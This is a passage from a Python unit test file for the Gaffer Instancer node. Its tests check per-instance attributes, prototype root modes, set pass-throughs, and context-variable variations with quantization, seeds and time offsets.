instancer["out"].attributes( "/object/instances/sphere" ),
IECore.CompoundObject()
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject()
)
instancer["attributes"].setValue( "testFloat testColor testPoint" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 0.0 ),
"testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
"testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
instancer["attributePrefix"].setValue( "user:" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"user:testFloat" : IECore.FloatData( 0.0 ),
"user:testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"user:testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"user:testFloat" : IECore.FloatData( 1.0 ),
"user:testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"user:testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
instancer["attributePrefix"].setValue( "foo:" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"foo:testFloat" : IECore.FloatData( 0.0 ),
"foo:testColor" : IECore.Color3fData( imath.Color3f( 1, 0, 0 ) ),
"foo:testPoint" : IECore.V3fData(
imath.V3f( 0 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"foo:testFloat" : IECore.FloatData( 1.0 ),
"foo:testColor" : IECore.Color3fData( imath.Color3f( 0, 1, 0 ) ),
"foo:testPoint" : IECore.V3fData(
imath.V3f( 1 ),
IECore.GeometricData.Interpretation.Point
)
} )
)
def testEmptyAttributesHaveConstantHash( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual(
instancer["out"].attributesHash( "/object/instances/sphere/0" ),
instancer["out"].attributesHash( "/object/instances/sphere/1" ),
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
instancer["out"].attributes( "/object/instances/sphere/1" ),
)
def testEditAttributes( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 2 ) ] ) )
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 0, 1 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
instancer["attributes"].setValue( "test*" )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 0.0 ),
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
} )
)
points["testFloat"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 1, 2 ] ),
)
objectToScene["object"].setValue( points )
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/0" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 1.0 ),
} )
)
self.assertEqual(
instancer["out"].attributes( "/object/instances/sphere/1" ),
IECore.CompoundObject( {
"testFloat" : IECore.FloatData( 2.0 ),
} )
)
def testPrototypeAttributes( self ) :
script = self.buildPrototypeRootsScript()
# add some attributes throughout the prototype hierarchies
script["attrFilter"] = GafferScene.PathFilter()
script["attrFilter"]["paths"].setValue( IECore.StringVectorData( [ "/foo", "/foo/bar", "/bar", "/bar/baz/cube" ] ) )
script["attributes"] = GafferScene.StandardAttributes()
script["attributes"]["in"].setInput( script["instancer"]["prototypes"].getInput() )
script["attributes"]["filter"].setInput( script["attrFilter"]["out"] )
script["attributes"]["attributes"]["deformationBlur"]["enabled"].setValue( True )
script["attrSpreadsheet"] = Gaffer.Spreadsheet()
script["attrSpreadsheet"]["selector"].setValue( "${scene:path}" )
script["attrSpreadsheet"]["rows"].addColumn( script["attributes"]["attributes"]["deformationBlur"]["value"] )
script["attributes"]["attributes"]["deformationBlur"]["value"].setInput( script["attrSpreadsheet"]["out"][0] )
for location, value in ( ( "/foo", False ), ( "/foo/bar", True ), ( "/bar", True ), ( "/bar/baz/cube", False ) ) :
row = script["attrSpreadsheet"]["rows"].addRow()
row["name"].setValue( location )
row["cells"][0]["value"].setValue( value )
script["instancer"]["prototypes"].setInput( script["attributes"]["out"] )
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar" ), IECore.CompoundObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/foo/{i}".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}/bar".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/foo/{i}/bar/sphere" ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/foo/{i}/bar/sphere".format( i=i ) )["gaffer:deformationBlur"].value, True )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/bar/{i}".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.CompoundObject() )
self.assertEqual( script["instancer"]["out"].fullAttributes( "/object/instances/bar/{i}/baz".format( i=i ) )["gaffer:deformationBlur"].value, True )
self.assertEqual( script["instancer"]["out"].attributes( "/object/instances/bar/{i}/baz/cube".format( i=i ) )["gaffer:deformationBlur"].value, False )
self.assertSceneValid( script["instancer"]["out"] )
def testUnconnectedInstanceInput( self ) :
plane = GafferScene.Plane()
plane["sets"].setValue( "A" )
plane["divisions"].setValue( imath.V2i( 1, 500 ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["parent"].setValue( "/plane" )
self.assertEqual( instancer["out"].set( "A" ).value.paths(), [ "/plane" ] )
def testDirtyPropagation( self ) :
plane = GafferScene.Plane()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( plane["out"] )
cs = GafferTest.CapturingSlot( instancer.plugDirtiedSignal() )
instancer["parent"].setValue( "plane" )
self.assertIn( instancer["out"]["childNames"], { x[0] for x in cs } )
del cs[:]
filter = GafferScene.PathFilter()
instancer["filter"].setInput( filter["out"] )
self.assertIn( instancer["out"]["childNames"], { x[0] for x in cs } )
def testNoPrimitiveAtParent( self ) :
group = GafferScene.Group()
sphere = GafferScene.Sphere()
sphere["sets"].setValue( "setA" )
groupFilter = GafferScene.PathFilter()
groupFilter["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( group["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["filter"].setInput( groupFilter["out"] )
self.assertSceneValid( instancer["out"] )
self.assertEqual( instancer["out"].childNames( "/group/instances" ) , IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].set( "setA" ) , IECore.PathMatcherData() )
def testSetPassThroughs( self ) :
# If the prototypes don't provide a set, then we should do a perfect
# pass through.
plane = GafferScene.Plane()
plane["sets"].setValue( "A" )
planeFilter = GafferScene.PathFilter()
planeFilter["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["filter"].setInput( planeFilter["out"] )
self.assertTrue( instancer["out"].exists( "/plane/instances/sphere/0" ) )
self.assertEqual( instancer["out"].setHash( "A" ), instancer["in"].setHash( "A" ) )
self.assertEqual( instancer["out"].set( "A" ), instancer["in"].set( "A" ) )
self.assertEqual( instancer["out"].set( "A" ).value.paths(), [ "/plane" ] )
def testContexts( self ):
points = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( i, 0, 0 ) for i in range( 100 ) ]
)
)
points["floatVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData(
[ 2 * math.sin( i ) for i in range( 100 ) ]
) )
points["vectorVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData(
[ imath.V3f( i + 2, i + 3, i + 4 ) for i in range( 100 ) ]
) )
points["uvVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V2fVectorData(
[ imath.V2f( i * 0.01, i * 0.02 ) for i in range( 100 ) ]
) )
points["intVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.IntVectorData(
[ i for i in range( 100 ) ]
) )
points["colorVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.Color3fVectorData(
[ imath.Color3f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4 ) for i in range( 100 ) ]
) )
points["color4fVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.Color4fVectorData(
[ imath.Color4f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4, i * 0.1 + 5 ) for i in range( 100 ) ]
) )
points["stringVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.StringVectorData(
[ "foo%i"%(i//34) for i in range( 100 ) ]
) )
points["unindexedRoots"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.StringVectorData(
[ ["cube","plane","sphere"][i//34] for i in range( 100 ) ]
) )
points["indexedRoots"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.StringVectorData( [ "cube","plane","sphere"] ),
IECore.IntVectorData( [(i//34) for i in range( 100 )] ),
)
pointsSource = GafferScene.ObjectToScene()
pointsSource["name"].setValue( "points" )
pointsSource["object"].setValue( points )
attributeSphere = GafferScene.Sphere()
sphereFilter = GafferScene.PathFilter()
sphereFilter["paths"].setValue( IECore.StringVectorData( [ '/sphere' ] ) )
		# In any practical situation where we just needed to set up attributes, we could use the "attributes"
		# plug to set them up more cheaply. But for testing, driving attribute values from an expression that
		# reads the context is the simplest way to observe the per-instance contexts.
customAttributes = GafferScene.CustomAttributes()
customAttributes["in"].setInput( attributeSphere["out"] )
customAttributes["filter"].setInput( sphereFilter["out"] )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "floatAttr", Gaffer.FloatPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member1" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "vectorAttr", Gaffer.V3fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member2" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "uvAttr", Gaffer.V2fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member3" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "intAttr", Gaffer.IntPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member4" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "colorAttr", Gaffer.Color3fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member5" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "color4fAttr", Gaffer.Color4fPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member6" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "stringAttr", Gaffer.StringPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ), True, "member7" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "seedAttr", Gaffer.IntPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member8" ) )
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "frameAttr", Gaffer.FloatPlug( "value", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member9" ) )
customAttributes["ReadContextExpression"] = Gaffer.Expression()
customAttributes["ReadContextExpression"].setExpression( inspect.cleandoc(
"""
parent["attributes"]["member1"]["value"] = context.get( "floatVar", -1 )
parent["attributes"]["member2"]["value"] = context.get( "vectorVar", imath.V3f(-1) )
parent["attributes"]["member3"]["value"] = context.get( "uvVar", imath.V2f(-1) )
parent["attributes"]["member4"]["value"] = context.get( "intVar", -1 )
parent["attributes"]["member5"]["value"] = context.get( "colorVar", imath.Color3f( -1 ) )
parent["attributes"]["member6"]["value"] = context.get( "color4fVar", imath.Color4f( -1 ) )
parent["attributes"]["member7"]["value"] = context.get( "stringVar", "" )
parent["attributes"]["member8"]["value"] = context.get( "seed", -1 )
parent["attributes"]["member9"]["value"] = context.get( "frame", -1 )
"""
) )
group = GafferScene.Group()
group["in"][0].setInput( customAttributes["out"] )
group["name"].setValue( 'withAttrs' )
cube = GafferScene.Cube()
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
parent = GafferScene.Parent()
parent["parent"].setValue( '/' )
parent["in"].setInput( group["out"] )
parent["children"][0].setInput( cube["out"] )
parent["children"][1].setInput( plane["out"] )
parent["children"][2].setInput( sphere["out"] )
pointsFilter = GafferScene.PathFilter()
pointsFilter["paths"].setValue( IECore.StringVectorData( [ '/points' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( pointsSource["out"] )
instancer["filter"].setInput( pointsFilter["out"] )
instancer["prototypes"].setInput( parent["out"] )
def uniqueCounts():
return dict( [ (i[0], i[1].value) for i in instancer["variations"].getValue().items() ] )
def childNameStrings( location ):
return [ i.value() for i in instancer['out'].childNames( location ) ]
def testAttributes( **expected ):
a = [ instancer['out'].attributes( "points/instances/withAttrs/" + i.value() + "/sphere" ) for i in instancer['out'].childNames( "points/instances/withAttrs" ) ]
r = {}
for n in a[0].keys():
r = [ i[n].value for i in a]
if n + "_seedCount" in expected:
self.assertEqual( len( set( r ) ), expected[ n + "_seedCount" ] )
elif n in expected:
self.assertEqual( len(r), len(expected[n]) )
if type( r[0] ) == float:
if r != expected[n]:
for i in range( len( r ) ):
self.assertAlmostEqual( r[i], expected[n][i], places = 6 )
else:
self.assertEqual( r, expected[n] )
else:
if type( r[0] ) == str:
self.assertEqual( r, [""] * len( r ) )
else:
self.assertEqual( r, [type( r[0] )( -1 )] * len( r ) )
# Compatible with C++ rounding
def compatRound( x ):
if x >= 0.0:
return math.floor(x + 0.5)
else:
return math.ceil(x - 0.5)
def quant( x, q ):
return compatRound( float( x ) / q ) * q
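		# Quick sanity checks for the helpers above (added for illustration; not part of
		# the original test) : compatRound() rounds halves away from zero, matching C++
		# round(), whereas Python 3's round() uses banker's rounding, and quant() snaps
		# a value to the nearest multiple of q using that same rounding.
		self.assertEqual( compatRound( 2.5 ), 3 )
		self.assertEqual( compatRound( -2.5 ), -3 )
		self.assertEqual( quant( 7, 10 ), 10 )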
self.assertEqual( uniqueCounts(), { "" : 1 } )
self.assertEqual( childNameStrings( "points/instances" ), [ "withAttrs", "cube", "plane", "sphere" ] )
self.assertEqual( childNameStrings( "points/instances/withAttrs" ), [ str(i) for i in range( 100 ) ] )
self.assertEqual( childNameStrings( "points/instances/cube" ), [] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [] )
instancer["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.RootPerVertex )
instancer["prototypeRoots"].setValue( "indexedRoots" )
self.assertEqual( uniqueCounts(), { "" : 3 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 0, 34 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 34, 68 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 68, 100 ) ] )
instancer["prototypeRoots"].setValue( "unindexedRoots" )
"""
# How things should work
self.assertEqual( uniqueCounts(), { "" : 3 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 0, 34 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 34, 68 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 68, 100 ) ] )
"""
# How things currently work
self.assertEqual( uniqueCounts(), { "" : 1 } )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 100 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [] )
instancer["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
instancer["prototypeIndex"].setValue( 'intVar' )
self.assertEqual( uniqueCounts(), { "" : 4 } )
self.assertEqual( childNameStrings( "points/instances/withAttrs" ), [ str(i) for i in range( 0, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/cube" ), [ str(i) for i in range( 1, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/plane" ), [ str(i) for i in range( 2, 100, 4 ) ] )
self.assertEqual( childNameStrings( "points/instances/sphere" ), [ str(i) for i in range( 3, 100, 4 ) ] )
# No context overrides yet
testAttributes( frameAttr = [ 1 ] * 25 )
instancer["contextVariables"].addChild( GafferScene.Instancer.ContextVariablePlug( "context" ) )
instancer["contextVariables"][0]["name"].setValue( "floatVar" )
instancer["contextVariables"][0]["quantize"].setValue( 0 )
# With zero quantization, everything is now unique
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = [ 2 * math.sin( i ) for i in range(0, 100, 4) ] )
# Check both the global unique count, and the per-context variable unique counts
self.assertEqual( uniqueCounts(), { "" : 100, "floatVar" : 100 } )
# With massive quantization, all values collapse
instancer["contextVariables"][0]["quantize"].setValue( 100 )
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = [ 0 for i in range(0, 100, 4) ] )
self.assertEqual( uniqueCounts(), { "" : 4, "floatVar" : 1 } )
# With moderate quantization, we can see how different prototypes combine with the contexts to produce
# more unique values
instancer["contextVariables"][0]["quantize"].setValue( 1 )
floatExpected = [ compatRound( 2 * math.sin( i ) ) for i in range(0, 100, 4) ]
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 20, "floatVar" : 5 } )
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [ "withAttrs", "cube", "plane", "sphere" ] ) )
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 20, "floatVar" : 5 } )
# Test an empty root
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [ "withAttrs", "", "plane", "sphere" ] ) )
self.assertEqual( uniqueCounts(), { "" : 15, "floatVar" : 5 } )
		# Now let's just focus on context variation
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [] ) )
instancer["prototypeIndex"].setValue( '' )
floatExpected = [ compatRound( 2 * math.sin( i ) ) for i in range(0, 100) ]
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 5, "floatVar" : 5 } )
# Add a second context variation
instancer["contextVariables"].addChild( GafferScene.Instancer.ContextVariablePlug( "context" ) )
instancer["contextVariables"][1]["name"].setValue( "vectorVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
vectorAttr = [ imath.V3f( i + 2, i + 3, i + 4 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "vectorVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
vectorAttr = [ imath.V3f( quant( i + 2, 10 ), quant( i + 3, 10 ), quant( i + 4, 10 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "vectorVar" : 31, "" : 64 } )
# Try all the different types
instancer["contextVariables"][1]["name"].setValue( "uvVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
uvAttr = [ imath.V2f( i * 0.01, i * 0.02 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "uvVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
uvAttr = [ imath.V2f( compatRound( i * 0.01 ), compatRound( i * 0.02 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "uvVar" : 4, "" : 20 } )
instancer["contextVariables"][1]["name"].setValue( "intVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
intAttr = [ i for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "intVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
intAttr = [ quant( i, 10 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "intVar" : 11, "" : 48 } )
instancer["contextVariables"][1]["name"].setValue( "stringVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
stringAttr = [ "foo%i" % ( i / 34 ) for i in range(100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "stringVar" : 3, "" : 15 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
six.assertRaisesRegex( self,
Gaffer.ProcessException, 'Instancer.out.attributes : Context variable "0" : cannot quantize variable of type StringVectorData',
instancer['out'].attributes, "points/instances/withAttrs/0/sphere"
)
six.assertRaisesRegex( self,
Gaffer.ProcessException, 'Instancer.variations : Context variable "0" : cannot quantize variable of type StringVectorData',
uniqueCounts
)
instancer["contextVariables"][1]["name"].setValue( "colorVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
colorAttr = [ imath.Color3f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "colorVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
colorAttr = [ imath.Color3f( compatRound( i * 0.1 + 2 ), compatRound( i * 0.1 + 3 ), compatRound( i * 0.1 + 4 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "colorVar" : 11, "" : 48 } )
instancer["contextVariables"][1]["name"].setValue( "color4fVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
color4fAttr = [ imath.Color4f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4, i * 0.1 + 5 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
color4fAttr = [ imath.Color4f( compatRound( i * 0.1 + 2 ), compatRound( i * 0.1 + 3 ), compatRound( i * 0.1 + 4 ), compatRound( i * 0.1 + 5 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 11, "" : 48 } )
# Set a high quantize so we can see how these variations interact with other types of variations
instancer["contextVariables"][1]["quantize"].setValue( 10 )
color4fExpected = [ imath.Color4f( quant( i * 0.1 + 2, 10 ), quant( i * 0.1 + 3, 10 ), quant( i * 0.1 + 4, 10 ), quant( i * 0.1 + 5, 10 ) ) for i in range(0, 100) ]
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "" : 20 } )
instancer["seedEnabled"].setValue( True )
instancer["rawSeed"].setValue( True )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr = list( range( 100 ) ) )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 100, "" : 100 } )
instancer["rawSeed"].setValue( False )
instancer["seeds"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
initialFirstVal = instancer['out'].attributes( '/points/instances/withAttrs/0/sphere' )["seedAttr"]
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "" : 67 } )
# Changing the seed changes individual values, but not the overall behaviour
instancer["seedPermutation"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertNotEqual( initialFirstVal, instancer['out'].attributes( '/points/instances/withAttrs/0/sphere' )["seedAttr"] )
# Total variation count is a bit different because the different variation sources line up differently
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "" : 69 } )
# If we generate 100 seeds from 100 ids, we will get many collisions, and only 67 unique values
instancer["seeds"].setValue( 100 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 67 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 67, "" : 94 } )
# Now turn on time offset as well and play with everything together
instancer["seeds"].setValue( 10 )
instancer["timeOffset"]["enabled"].setValue( True )
instancer["timeOffset"]["name"].setValue( 'floatVar' )
instancer["timeOffset"]["quantize"].setValue( 0.0 )
testAttributes( frameAttr = [ 1 + 2 * math.sin( i ) for i in range(0, 100) ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 100, "" : 100 } )
instancer["timeOffset"]["quantize"].setValue( 0.5 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 9, "" : 82 } )
instancer["timeOffset"]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 5, "" : 69 } )
c = Gaffer.Context()
c["frame"] = IECore.FloatData( 42 )
with c:
testAttributes( frameAttr = [ i + 42 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 5, "" : 69 } )
# Now reduce back down the variations to test different cumulative combinations
instancer["seedEnabled"].setValue( False )
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "frame" : 5, "" : 20 } )
